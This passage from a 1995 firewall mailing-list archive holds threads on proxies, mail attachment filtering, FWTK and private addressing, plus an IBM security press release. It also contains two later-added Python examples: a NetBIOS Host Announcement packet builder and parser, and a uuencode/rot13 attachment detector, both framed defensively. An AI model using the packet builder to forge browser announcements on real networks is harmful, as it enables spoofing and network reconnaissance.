http://www.issc1.ibm.com/rsdirect/us/promotions/techinfo.htm ----------------- H. 
Morrow Long, Mgr of Dev., Yale Univ., Comp Sci Dept, 011 AKW, New Haven, CT 06520-8285, VOICE: (203)-432-{1248,1254} FAX: (203)-432-0593 INET: Long-Morrow@CS.Yale.EDU UUCP: yale!Long-Morrow BITNET: Long-Morrow@YaleCS WWW: http://www.cs.yale.edu/HTML/YALE/CS/HyPlans/long-morrow.html From firewalls-owner Fri Oct 6 14:02:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11869 for firewalls-outgoing; Fri, 6 Oct 1995 13:47:14 -0700 Received: from Rt66.com (mack.rt66.com [198.59.162.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA11862 for ; Fri, 6 Oct 1995 13:47:10 -0700 Received: by Rt66.com (4.1/SMI-4.1) id AA28221; Fri, 6 Oct 95 14:42:10 MDT From: dlewis@Rt66.com (David Lewis) Message-Id: <9510062042.AA28221@Rt66.com> Subject: Re: VRML through a Proxy To: firewalls@greatcircle.com Date: Fri, 6 Oct 1995 14:42:09 -0600 (MDT) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 598 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Has anybody successfully used VRML ( Virtual Reality Markup Language ) > through an Application based Proxy firewall? > If so, what was the client VRML viewer, and what was the firewall > product? I actually just tried it using FWTK's http-gw on the firewall, and the WorldView demo off of the CDROM from Mark Pesce's new book. It worked right off the bat with no changes to the firewall. Of course, we're already setup for web browsing. If you can web browse, I believe you ought to be able to use VRML browsers with no changes to your firewall. 
dl -- David Lewis dlewis@rt66.com From firewalls-owner Fri Oct 6 14:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA13223 for firewalls-outgoing; Fri, 6 Oct 1995 14:27:15 -0700 Received: from charon.ppco.com (ppco.com [138.32.15.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA13216 for ; Fri, 6 Oct 1995 14:27:10 -0700 From: bcsolom@bvemx.ppco.com Received: from bvemx.ppco.com by charon.ppco.com with SMTP id AA12002 (InterLock SMTP Gateway 3.0 for ); Fri, 6 Oct 1995 16:25:40 -0500 X400-Originator: bcsolom@bvemx.ppco.com X400-Recipients: firewalls@GreatCircle.COM X400-Mts-Identifier: [/ADMD=ATTMAIL/C=US/;0011200001408865000004] X400-Content-Type: P2-1988 (22) Priority: Urgent Message-Id: <0011200001408865000004*@MHS> To: "firewalls(a)GreatCircle.COM" Subject: VRML Through a Proxy Firewall Date: Fri, 6 Oct 1995 16:22:09 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anybody successfully used VRML ( Virtual Reality Markup Language ) through an Application based Proxy firewall? If so, what was the client VRML viewer, and what was the firewall product? 
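Greg King's description of the NT Host Announcement frame earlier in this digest gives the byte budget (NBT datagram section, SMB transaction carrying a mailslot write to \MAILSLOT\BROWSE, 33-byte browser record) but not the bytes themselves. The Python below is an added example, not Microsoft's code and not from his message: it builds a Host Announcement with that layout, following RFC 1002 for the NetBIOS datagram and name encoding and the CIFS browser protocol for the record, and parses one back out of a captured payload. The host name CHOPPER is borrowed from his mail headers; the workgroup, the source address 10.0.0.7, the datagram id, the OS version and the flag values are constructed, and the SV_TYPE table is a subset of the real one.

```python
import struct

HOST_ANNOUNCEMENT = 0x01
MAILSLOT = b"\\MAILSLOT\\BROWSE\x00"
NBT_DATAGRAM_PORT = 138
SV_TYPES = {   # subset of the SV_TYPE_* flags (lmserver.h) carried in the ServerType field
    0x00000001: "WORKSTATION", 0x00000002: "SERVER", 0x00001000: "NT",
    0x00008000: "SERVER_NT", 0x00010000: "POTENTIAL_BROWSER",
    0x00020000: "BACKUP_BROWSER", 0x00040000: "MASTER_BROWSER",
}


def encode_nb_name(name: str, suffix: int) -> bytes:
    """RFC 1001 first-level encoding: 15 space-padded characters plus the suffix byte,
    each byte written as two letters 'A'..'P'; 34 bytes with length byte and terminator."""
    raw = name.upper().encode("ascii").ljust(15)[:15] + bytes([suffix])
    enc = b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw)
    return bytes([32]) + enc + b"\x00"


def decode_nb_name(buf: bytes):
    if buf[0] != 32:
        raise ValueError("bad NetBIOS name length")
    raw = bytes(((buf[1 + 2 * i] - 0x41) << 4) | (buf[2 + 2 * i] - 0x41) for i in range(16))
    return raw[:15].decode("ascii").rstrip(), raw[15]


def build_host_announcement(workgroup: str, host: str, src_ip: str, server_type: int,
                            periodicity_ms: int, comment: bytes = b"") -> bytes:
    """UDP payload of a browser Host Announcement: NBT datagram header and names,
    SMB_COM_TRANSACTION mailslot write to \\MAILSLOT\\BROWSE, then the browser record."""
    browse = struct.pack("<BBI16sBBIBBH", HOST_ANNOUNCEMENT, 1, periodicity_ms,
                         host.upper().encode("ascii").ljust(16, b"\x00"),
                         3, 51, server_type, 15, 1, 0xAA55) + comment + b"\x00"
    # 32-byte SMB header: command 0x25, flags 0x18 (case-insensitive, canonical paths)
    smb_hdr = b"\xffSMB" + struct.pack("<BIBHH8sHHHHH", 0x25, 0, 0x18, 0, 0, bytes(8), 0, 0, 0, 0, 0)
    data_off = 32 + 1 + 34 + 2 + len(MAILSLOT)     # browse record offset, counted from 0xff 'SMB'
    trans = struct.pack("<BHHHHBBHIHHHHHBBHHH", 17, 0, len(browse), 0, 0, 0, 0, 0, 0, 0,
                        0, data_off, len(browse), data_off, 3, 0,
                        1, 0, 2)                   # setup words: write mailslot, priority 0, unreliable class
    smb = smb_hdr + trans + struct.pack("<H", len(MAILSLOT) + len(browse)) + MAILSLOT + browse
    src_name = encode_nb_name(host, 0x00)        # <00>: workstation service of the announcing host
    dst_name = encode_nb_name(workgroup, 0x1D)   # <1D>: the local master browser for this workgroup
    nbt = struct.pack(">BBH4sHHH", 0x11, 0x02, 0x1234,   # direct group datagram, first (only) fragment
                      bytes(int(o) for o in src_ip.split(".")), NBT_DATAGRAM_PORT,
                      len(src_name) + len(dst_name) + len(smb), 0)
    return nbt + src_name + dst_name + smb


def parse_host_announcement(payload: bytes) -> dict:
    """Pull the security-relevant fields back out of a captured announcement."""
    msg_type, flags, dgm_id, src_ip, src_port = struct.unpack_from(">BBH4sH", payload)
    if msg_type not in (0x10, 0x11, 0x12):
        raise ValueError("not a NetBIOS datagram")
    host, host_suffix = decode_nb_name(payload[14:48])
    dest, dest_suffix = decode_nb_name(payload[48:82])
    smb = payload[82:]
    if smb[:4] != b"\xffSMB" or smb[4] != 0x25:
        raise ValueError("not an SMB transaction")
    word_count = smb[32]
    name_start = 33 + 2 * word_count + 2          # past the parameter words and ByteCount
    name_end = smb.index(b"\x00", name_start) + 1
    if smb[name_start:name_end] != MAILSLOT:
        raise ValueError("not a browser mailslot")
    data = smb[name_end:]
    (opcode, update_count, period, server, os_major, os_minor, stype,
     br_major, br_minor, signature) = struct.unpack_from("<BBI16sBBIBBH", data)
    if opcode != HOST_ANNOUNCEMENT or signature != 0xAA55:
        raise ValueError("not a Host Announcement")
    return {
        "src_ip": ".".join(str(b) for b in src_ip), "src_port": src_port,
        "nbt_host": host, "workgroup": dest, "dest_suffix": dest_suffix,
        "server": server.split(b"\x00")[0].decode("ascii"),
        "os_version": (os_major, os_minor), "period_ms": period,
        "types": [n for bit, n in SV_TYPES.items() if stype & bit],
        "comment": data[32:].split(b"\x00")[0].decode("ascii", "replace"),
    }
```

The payload this produces is 201 bytes; with the 8-byte UDP, 20-byte IP and 14-byte Ethernet headers in front of it that is the 243 bytes quoted in the message, and the 82/86/33 split falls out of the structure rather than being hard-coded. What the parser returns (host name, workgroup, OS version, role flags, the 12-minute announcement period) is the reason a border firewall should drop UDP 137/138 and TCP 139 in both directions instead of relying on this traffic being "only a broadcast": a router that forwards directed broadcasts, or a host with a helper address configured, will happily carry it off the subnet.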
From firewalls-owner Fri Oct 6 14:30:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA13062 for firewalls-outgoing; Fri, 6 Oct 1995 14:19:57 -0700 Received: from dns.state.mi.us (dns.state.mi.us [204.25.6.18]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA13055 for ; Fri, 6 Oct 1995 14:19:52 -0700 Received: from STATE.MI.US (ngwsmtp.state.mi.us [167.240.253.6]) by dns.state.mi.us (8.6.12/8.6.12) with SMTP id RAA11749 for ; Fri, 6 Oct 1995 17:13:01 -0400 Received: from MI-Message_Server by STATE.MI.US with Novell_GroupWise; Fri, 06 Oct 1995 17:09:32 -0400 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Fri, 06 Oct 1995 17:19:23 -0400 From: Mark Jaeger To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #579 -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Until I return from vacation on October 16, Linda Baker will receive a forwarded copy of all my correspondence. From firewalls-owner Fri Oct 6 15:01:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA12561 for firewalls-outgoing; Fri, 6 Oct 1995 14:08:01 -0700 Received: from wh.bayer.com (wh.bayer.com [192.80.67.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA12547 for ; Fri, 6 Oct 1995 14:07:53 -0700 From: tws@wh.bayer.com Received: from mrcs1 ([140.250.41.24]) by wh.bayer.com (8.6.12/8.6.12) with SMTP id RAA12161; Fri, 6 Oct 1995 17:02:48 -0400 Received: by mrcs1 (5.64/X1.00) id AA27676; Fri, 6 Oct 95 17:00:13 -0400 Date: Fri, 6 Oct 95 17:00:13 -0400 Message-Id: <9510062100.AA27676@mrcs1> To: alan@mid.net, firewalls-digest@GreatCircle.COM, jcroall@thor.tjhsst.edu Subject: Re: WWW & Proxy Servers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From firewalls-owner@GreatCircle.COM Thu Oct 5 00:56:56 1995 > To: alan@mid.net, firewalls-digest@GreatCircle.COM > Subject: Re: WWW & Proxy Servers > From: "James Croall" . . 
> The whole system is relatively easy; In fact I > implemented it as a little toy a little while > ago, adding HTTP Proxy support, S/Key > authentication, and SSL (based on the SSLeay package) > all on top of NCSA 1.4. As far as I played with > it, it seemed to work. > > If anybody wants to play with it, I can dig up > code. > --- > jcroall@tjhsst.edu * jcroall@foo.org > http://www.tjhsst.edu/people/jcroall/ Rather than have you dig it up and give it to somebody, does it not make sense to have you give the code to ncsa and have them incorporate it into the next release? According to what you describe, that doesn't sound hard. Regards, Tenna Sakai (tws@wh.bayer.com) Bayer Inc. From firewalls-owner Fri Oct 6 17:01:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17189 for firewalls-outgoing; Fri, 6 Oct 1995 16:46:37 -0700 Received: from port.island.net (port.island.net [199.60.231.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA17182 for ; Fri, 6 Oct 1995 16:46:33 -0700 Received: from hakatac.port.island.net by port.island.net with smtp (Smail3.1.29.1 #2) id m0t1MK9-000IMBC; Fri, 6 Oct 95 16:37 PDT Received: by hakatac.port.island.net (4.1/SMI-4.1) id AA21638; Fri, 6 Oct 95 16:34:51 PDT To: firewalls@greatcircle.com Subject: Firewalls From: soccer@hakatac.almanac.bc.ca (mi) Message-Id: <4ZPkcD9w165w@hakatac.almanac.bc.ca> Date: Fri, 06 Oct 95 16:34:26 PDT Organization: Sir HackAlot's UNIX BBS, Port Alberni, B.C. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Would you please add me to your mailing list?
L8r, Sonic From firewalls-owner Fri Oct 6 17:11:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17111 for firewalls-outgoing; Fri, 6 Oct 1995 16:40:04 -0700 Received: from charon.ppco.com (ppco.com [138.32.15.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA12783 for ; Fri, 6 Oct 1995 14:13:01 -0700 From: asunden@bvemx.ppco.com Received: from bvemx.ppco.com by charon.ppco.com with SMTP id AA11489 (InterLock SMTP Gateway 3.0 for ); Fri, 6 Oct 1995 16:11:21 -0500 X400-Originator: asunden@bvemx.ppco.com X400-Recipients: firewalls@greatcircle.com X400-Mts-Identifier: [/ADMD=ATTMAIL/C=US/;0011200001408839000004] X400-Content-Type: P2-1988 (22) Message-Id: <0011200001408839000004*@MHS> To: "firewalls(a)greatcircle.com" Subject: NOTE 10/06/95 16:11:00 Date: Fri, 6 Oct 1995 16:07:52 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To: OAS --BVEMX1 EMXOAS Has anyone been able to get VRML (virtual reality markup language) to work properly through an application proxy firewall? From firewalls-owner Fri Oct 6 17:12:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17061 for firewalls-outgoing; Fri, 6 Oct 1995 16:39:02 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA28759 for ; Fri, 6 Oct 1995 06:27:19 -0700 Message-Id: <199510061327.GAA28759@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA035495947; Fri, 6 Oct 1995 23:25:47 +1000 From: Darren Reed Subject: Security announcement from IBM. To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Fri, 6 Oct 1995 23:25:46 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 10977 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I believe this announcement is of interest to firewalls... 
...there are some very interesting items below, including IBM setting up their own CERT squad. I apologise in advance if it has already been posted here and I just haven't caught up with it. darren > *------------------------------------------------------------------------ > IBM Announces Security Software and Services to Protect the Enterprise > September 28, 1995 > > As part of its long-standing commitment to data security, IBM has > announced enhancements, availability and pricing for a broad range of > I/T security products and services designed to protect the enterprise > from intrusion. > > The announcement includes: > > -- The launch of the Emergency Response Service, which provides expert > incident management skills to clients during and after electronic > security emergencies; > > -- A Customized Infiltration Tool Kit, to detect the most > subtle weaknesses in a customer's Internet connection; > > -- Significant enhancements and price reductions on IBM's > firewall product; > > -- The announcement for secure Web servers and browsers; > enhancements to IBM AntiVirus software to support Windows 95 **; > > -- The availability of a new release of RACF *, IBM's award- > winning Resource Access Control Facility, which now provides > password synchronization across your RACF managed systems; > > -- The announcement of Internet secure OS/400 *, the operating system > for the world's most popular business computing system. > > > Emergency Response Team Operational Worldwide > > In response to concerns about network infiltrations, IBM > announced that its Emergency Response Service for commercial > businesses is now operational for customers throughout the world.
> Chartered to provide swift, expert incident management skills to clients during and after electronic security emergencies, the emergency response team specializes in electronic disasters that affect data processing capabilities, and is available to customers on a subscription basis via IBM's Integrated Systems Solutions Corporation (ISSC)*.
>
> This global service periodically checks customers' networks and can act as an extension of clients' I/T staffs. In the event of a network break-in, the team helps customers detect, isolate, contain and recover from unauthorized network infiltration. They are on call 24 hours a day, seven days a week around the world. IBM team members, who have extensive incident management experience, develop an understanding of customers' networks and system architectures, as well as how their firewalls are configured and maintained.
>
>
> Customized Weakness Detection Kit
>
> IBM's Customized Infiltration Tool Kit, a sophisticated set of tools to detect security weaknesses in clients' Internet connections, is available today. With these tools, IBM can probe the subtlest weaknesses that the most sophisticated hackers might try to exploit.
>
> These tools exercise network connections that go beyond the capabilities of most existing tools on the market and are customized to match clients' specific network configurations.
>
> The Customized Infiltration Tool Kit is part of IBM's I/T Security Consulting offering, and was developed in conjunction with IBM Research's Global Security Analysis Labs in New York and Zurich.
>
>
> Advanced Firewall Security***
>
> As part of these security announcements, IBM announces a new release and a price reduction for its firewall, the Internet Connection Secured Network Gateway*, to promote its wider availability and advance the state of security on the Internet.
> Formerly known as the NetSP Secured Network Gateway, the Internet Connection Secure Network Gateway will be available to the public on October 27.
>
> The firewall now supports AIX 4.1.3, and operates with the popular RISC System/6000* workstation. It contains an encrypted IP tunnel that encodes data from one firewall to another using DES, the Data Encryption Standard invented by IBM more than 20 years ago, and Commercial Data Masking Facility (CDMF), an exportable encryption technology used outside of North America. The IP tunnel and key distribution is one of the first that is based on the latest IETF specifications, providing the most advanced technology for firewalls currently available.
>
> The Internet Connection Secured Network Gateway also includes remote administration and an alarm capability that allows a user to set alerts that are triggered when certain errors or other security violations occur.
>
>
> Secure Web Servers and Browsers***
>
> IBM is also announcing the IBM Internet Connection Secure Web Servers for the OS/2* and AIX* platforms and IBM's Internet Connection Secure WebExplorer for OS/2 Warp. Using the industry standard protocols Secure HyperText Transfer Protocol (S-HTTP) and Secure Sockets Layer (SSL)**, these secure Web servers and browser will be commercially available on December 8. IBM Internet Connection Secure Servers provide several security methods for conducting commerce over the Internet, including public key data encryption technology.
>
>
> Anti-Virus Software and Services
>
> IBM also announced that its IBM AntiVirus software will be available for the Windows 95 platform in November. IBM AntiVirus software provides comprehensive virus detection, removal and protection for over 6,000 known computer viruses, and is widely available on the OS/2*, DOS**, Windows**, and NetWare** platforms for $49.
> IBM AntiVirus scans memory, hard disks, floppy drives and network servers for thousands of viruses, including polymorphic viruses that change to avoid detection, and viruses previously considered impossible to discover. To uncover unknown viruses, the software contains heuristics that attempt to find viruses by watching for behavior that is characteristic of viruses. IBM's anti-virus software products are available on the Internet via IBM's AntiVirus home page at http://www.brs.ibm.com/ibmav.html.
>
>
> RACF 2.2 Debuts
>
> IBM's acclaimed Resource Access Control Facility (RACF) for MVS will debut Version 2.2 this week on September 29. RACF is a versatile, effective security tool that protects MVS system resources from inadvertent damage and deliberate misuse of data. New features for RACF 2.2 include password synchronization and the ability to administer multiple remote RACF databases with a single command, without logging onto the remote systems. RACF 2.2 also features a "remove ID" utility that eliminates security problems created by old, unneeded user ID's, and has expanded its support for OpenEdition MVS by providing security checking and auditing for the XPG4 environment. RACF 2.2 also provides enhancements to its PassTicket support, an alternative to RACF passwords. With RACF 2.2 you can now use unique PassTicket keys for different RACF users and groups who need access to the same secured application.
>
> These new features build upon support provided in RACF 2.1, such as RACF's sysplex data sharing support which uses the System/390 parallel sysplex services to cache RACF data. RACF also uses these services to transmit selected administrative commands to peer RACF systems. The administrator can send these commands from one system to take effect on all systems enabled for sysplex communication.
> IBM has previously announced its intention to enhance RACF for VM by providing support for the OpenEdition POSIX and Shared File System features of VM/ESA.
>
>
> Internet Secure OS/400
>
> IBM's AS/400 operating system, OS/400, offers a fully integrated set of security features that have been evaluated to meet the U.S. Government C2 security criteria. OS/400 Version 2 Release 3 is scheduled to receive the C2 rating at the National Security Conference in October. Subsequent releases of OS/400 have been designed to meet C2 and IBM intends to continue to participate in the government evaluation process. Included in the C2 evaluation was the AS/400 relational database DB2/400, which is integrated into the operating system, and utilizes the same security mechanisms as OS/400. This ensures the integrity of information stored in OS/400, as well as the security of user access to AS/400 computing resources, providing customers with unmatched security for midrange system computing.
>
> IBM's AS/400 provides full individual accountability via a centralized identification and authentication built into the system. Users are uniquely identified by a one-way DES encrypted password.
>
> Since all sharable data is contained in encapsulated objects, discretionary access control is maintained by each object manager using a system-wide access algorithm. Access to objects may be controlled through public, private, or adopted authorities and may be managed through user groups and common object authorization lists.
>
> Additionally, AS/400 provides a highly configurable set of auditing capabilities selectable to individual users, objects, or events.
>
> Hardware and software encryption/decryption capabilities supporting data confidentiality, non-repudiation, authentication, and data integrity are also available on AS/400.
> These announcements complement a wide range of I/T security offerings already available from IBM -- from encryption hardware and software, access control products, firewalls and security management and administration, to DCE security services, IBM Global Network security services and implementation services. Additional information on these offerings can be found through the IBM I/T Security home page, at http://www.ibm.com/Security.
>
> IBM's security products support the security component of the Open Blueprint. A white paper with information about security in the Open Blueprint is available for reference on the Internet at: http://www.torolab.ibm.com/openblue/openblue.html.
>
> For more information about other IBM products and services, see the IBM home page on the World Wide Web, located at http://www.ibm.com.
>
> * Indicates trademark or registered trademark of International Business Machines.
>
> ** Indicates trademark or registered trademark of the respective companies.
>
> *** Editor's Note: For more information on IBM's advanced firewall security and Internet Connection Secure Web Servers and Browsers, please refer to the accompanying press release.
From firewalls-owner Fri Oct 6 20:00:12 1995
From: Carl Jolley
To: Chris Tyler
Cc: Slava Kritov, Firewalls@GreatCircle.COM
Date: Fri, 6 Oct 1995 22:43:34 -0400 (EDT)
Subject: Re: Mail Proxy

Uhh, and what do you suggest for a uuencoded text that's been rot13'ed and is appended to the body of the message, not attached?

**** cjolley@iac.net ****
**** All opinions are my own and not necessarily those of my employer ****

On Fri, 29 Sep 1995, Chris Tyler wrote:

>
> Slava Kritov writes:
>
> > Any uuencode ?
> > Sorry, as a sysadm of 500+ orgs can say, that people sometimes exchange
> > word docs in uuencode, and ( for Mac's ) you can't even say it's word doc
> > based on name ...
>
> Right... so? The purpose was to deny all attachments, whether word DOCs or executables. So
> you look for the uuencode signature string and deny.
>
> Chris Tyler          Chris@DeJong.Com          CTyler@Oxford.Net
> Systems Development Manager, Wm. De Jong Enterprises Inc.
> +1-519-424-9007 / fax +1-519-424-2399
>

From firewalls-owner Fri Oct 6 23:30:12 1995
From: "greg hume"
To: firewalls@greatcircle.com, fwtk-users@tis.com
Date: Sat, 07 Oct 95 16:00:24 eet
Subject: FWTK ftp-gw, http-gw Statically linked problem

Hi all,

We are at this moment attempting to find the cause of a problem with FWTK 1.3. The FTP-GW and HTTP-GW are the services we have configured so far. Each time we start the service by connecting to the server/firewall we are getting "Statically Linked" messages. The messages appear in the log files and on telnet sessions when we telnet to the gw service ports. We think it may be an environment problem but cannot pin it down.

The authsvr has successfully been compiled with linking forced to be dynamic or static. The gw apps appear to work fine in debug mode.

Any help/advice would be welcome. I really don't wish to scrog the hd and rebuild from aaaaaAAARGH.

Greg
Senior Systems/Network Analyst
Cybergraphic Systems PTY LTD.
862 Glenferrie Rd.
Hawthorn, Melbourne, Australia 3122

From firewalls-owner Fri Oct 6 23:30:18 1995
From: "greg hume"
To: firewalls@greatcircle.com, fwtk-users@tis.com
Date: Sat, 07 Oct 95 16:04:54 eet
Subject: RE: FWTK ftp-gw, http-gw Statically linked problem

On 7/10/95 Greg wrote:
>Hi all,
>We are at this moment attempting to find the cause of a problem with
>FWTK 1.3. The FTP-GW and HTTP-GW are the services we have configured
>so far. Each time we start the service by connecting to the
>server/firewall we are getting "Statically Linked" messages. The
>messages appear in the log files and on telnet sessions when we telnet
>to the gw service ports. We think it may be an environment problem but
>cannot pin it down.
>The authsvr has successfully been compiled with linking forced to be
>dynamic or static. The gw apps appear to work fine in debug mode.
>Any help/advice would be welcome. I really don't wish to scrog the hd
>and rebuild from aaaaaAAARGH.

PS. We are running Linux build 1.3.8

Greg
Senior Systems/Network Analyst
Cybergraphic Systems PTY LTD.
862 Glenferrie Rd.
Hawthorn, Melbourne, Australia 3122

From firewalls-owner Sat Oct 7 13:30:05 1995
From: Gordon Hayes
To: firewalls@greatcircle.com
Date: Sat, 7 Oct 95 16:20:58 -0400

From firewalls-owner Sat Oct 7 14:00:19 1995
From: Gordon Hayes
To: Firewalls@greatcircle.com
Date: Sat, 7 Oct 95 16:31:18 -0400
Subject: Survey

Hello,

I am a Graduate Student at the University of Toronto, Canada, doing my thesis on DATA COMMUNICATION SECURITY AUDIT. I would greatly appreciate it if you could take a minute to assist me in my academic endeavours by reviewing and completing the following questionnaire.
Respondents will receive a summary of the findings. All information provided will be held in the strictest confidence. Any questions you do not wish to answer, please mark "N/A". Any additional comments which you might feel would be helpful in this study would be greatly appreciated.

Thank you in advance for your assistance in this study.

Questions:

a) As a firm, are you concerned about the security of your Internet connection?
b) Are you concerned about the auditability of your Internet connection?
c) Please rate the importance of the following to your firm:
   i) timeliness of reporting
   ii) readability of audit reports
   iii) notification of breach
   iv) traffic pattern analysis
   v) forensic analysis
   vi) personal contact
   vii) seamless integration into your particular environment.
d) What type of firewall systems do you use today?
e) How long have you been connected to the Internet?
f) How long have you used a firewall?
g) How big is your organization? - # employees and sales revenue, remote locations, # people authorized to use the Internet?

Thank you for taking time in completing the above. I look forward to tabulating the results.
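Added example for the "Mail Proxy" thread above (Chris Tyler's suggestion to look for the uuencode signature string and deny, and Carl Jolley's question about a rot13'd uuencoded block pasted into the body): a body scanner that checks each line both as-is and rot13-decoded for the `begin <mode> <name>` header and validates the shape of the following data line. This is not code from either post; the sample message bodies are constructed.

```python
"""Detect uuencoded payloads carried in a mail body, including rot13'd ones.

Added example for the "Mail Proxy" thread (not code from the posts).
Standard library only; the sample bodies below are constructed.
"""
import binascii
import codecs
import re
from typing import List, NamedTuple

# A uuencode block opens with "begin <octal mode> <filename>" and closes with "end".
BEGIN_RE = re.compile(r"^begin\s+[0-7]{3,4}\s+(\S.*)$")
MAX_LINE_BYTES = 45  # classic uuencode carries at most 45 raw bytes per data line


class Finding(NamedTuple):
    line_no: int   # 1-based line of the "begin" header in the body
    encoding: str  # "plain" or "rot13"
    filename: str


def uu_line_is_plausible(line: str) -> bool:
    """True if `line` has the shape of a uuencode data line.

    The first character encodes the byte count n as chr(32 + n); the rest must be
    exactly 4 * ceil(n / 3) characters from the uuencode alphabet (ASCII 32..96).
    Checking the line after "begin" keeps a stray "begin 644 notes.txt" in
    ordinary prose from tripping the filter.
    """
    if not line:
        return False
    n = (ord(line[0]) - 32) & 0x3F
    if n == 0 or n > MAX_LINE_BYTES:
        return False
    data = line[1:]
    return len(data) == 4 * ((n + 2) // 3) and all(32 <= ord(c) <= 96 for c in data)


def scan_body(body: str) -> List[Finding]:
    """Find uuencode headers, trying each line as-is and rot13-decoded.

    rot13 only moves letters, and the uuencode alphabet contains A-Z, so a
    rot13'd block still looks like printable text; decoding every line and
    re-checking the signature plus the following data line catches it.
    """
    lines = body.splitlines()
    findings: List[Finding] = []
    decoders = (("plain", lambda s: s), ("rot13", lambda s: codecs.decode(s, "rot_13")))
    for idx, raw in enumerate(lines[:-1]):
        for encoding, decode in decoders:
            m = BEGIN_RE.match(decode(raw).rstrip())
            if m and uu_line_is_plausible(decode(lines[idx + 1]).rstrip("\r")):
                findings.append(Finding(idx + 1, encoding, m.group(1).strip()))
                break
    return findings


def should_reject(body: str) -> bool:
    """Policy from the thread: deny any message carrying an (encoded) attachment."""
    return bool(scan_body(body))


def encode_uu(payload: bytes, filename: str) -> str:
    """Produce a classic uuencode block (used only to build the constructed samples)."""
    out = [f"begin 644 {filename}"]
    for i in range(0, len(payload), MAX_LINE_BYTES):
        chunk = binascii.b2a_uu(payload[i:i + MAX_LINE_BYTES], backtick=True)
        out.append(chunk.decode("ascii").rstrip("\n"))
    out += ["`", "end"]
    return "\n".join(out) + "\n"


# Constructed sample bodies (not real mail); the payload bytes are arbitrary.
_PAYLOAD = bytes(range(64))
_PROSE = "Hi,\n\nHere is the file we talked about.\n\n"
SAMPLE_PLAIN_BODY = _PROSE + encode_uu(_PAYLOAD, "report.doc")
SAMPLE_ROT13_BODY = _PROSE + codecs.encode(encode_uu(_PAYLOAD, "report.doc"), "rot_13")
SAMPLE_PROSE_BODY = "begin 644 notes.txt\nSorry, I meant to attach that but forgot.\n"

if __name__ == "__main__":
    for name, body in (("plain", SAMPLE_PLAIN_BODY), ("rot13", SAMPLE_ROT13_BODY),
                       ("prose", SAMPLE_PROSE_BODY)):
        verdict = "REJECT" if should_reject(body) else "accept"
        print(f"{name:6} -> {verdict} {scan_body(body)}")
```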
From firewalls-owner Sat Oct 7 17:00:13 1995
From: KiDDi
To: firewalls@greatcircle.com
Date: Sat, 7 Oct 1995 23:34:18 +0000 (GMT)

sunscribe firewalls-digest

From firewalls-owner Sun Oct 8 08:30:00 1995
From: njb@knoware.nl (Niels Bjergstrom)
To: firewalls@GreatCircle.COM
Date: Sun, 8 Oct 1995 16:04:48 +0100
Subject: Brent Chapman in Europe

A number of people have informed me that they did not see the original announcement of Brent's tutorials in Europe because of vacation. I probably should have reposted it, but I rarely use the net for advertising purposes.
However, there is still space at the following tutorials: in Munchen Oct 16, in Amsterdam Oct 17 and in London Oct 19. Email me for further info in case of interest.

Niels

--  Niels J Bjergstrom, Ph.D., m/ISACA          Tel. +31 70 362 2269          --
--  Computer Security Engineers, Ltd.           Fax. +31 70 365 2286          --
--  Postbus 85 502, NL-2508 CE Den Haag         London: +44 181 519 8011      --
--  Netherlands                                 Email: njb@csehost.knoware.nl --
--  PGP Public key available on request - please use when mailing vira        --

From firewalls-owner Sun Oct 8 09:00:07 1995
From: Howard Berkowitz
To: firewalls@greatcircle.com
Cc: hcb@clark.net (Howard Berkowitz)
Date: Sun, 8 Oct 1995 11:53:29 -0400 (EDT)
Subject: RFC1597 subtleties

There have been several discussions going that deal purely with RFC1597, or its use with network address translation. While this might be slightly far afield, there are some subtleties of certain ways to use RFC1597. I refer specifically to the use of the "class A block," 10.0.0.0, rather than the Class B or Class C blocks, and potential interactions with routing.

If one uses 10.0.0.0 with a classful routing protocol such as RIP or IGRP, there will be no opportunity for route summarization. For each additional subnet, the total routing update size will grow by at least 24 bytes for RIP and 104 bytes for IGRP.
Packet fragmentation, etc., may cause additional growth. There's no free lunch.

If one uses the Class B or Class C blocks, one must be careful to avoid discontiguous subnets if also using a classful routing protocol. Discontiguous subnets arise when two subnets of one major network are separated by a subnet of another major network (e.g., two LANs in 172.20.0.0 are interconnected by a serial line in 172.21.0.0). This won't work unless a classless routing protocol such as OSPF, EIGRP, or integrated IS-IS is used.

Classless routing protocols also would allow summarization with 10.0.0.0. They are, however, harder to configure.

Howard

From firewalls-owner Sun Oct 8 09:30:18 1995
From: Rolf-Weber
To: firewalls@greatcircle.com
Date: Sun, 8 Oct 95 17:21:46 MEZ
Subject: sendmail on AIX without suid root?

Hi all,

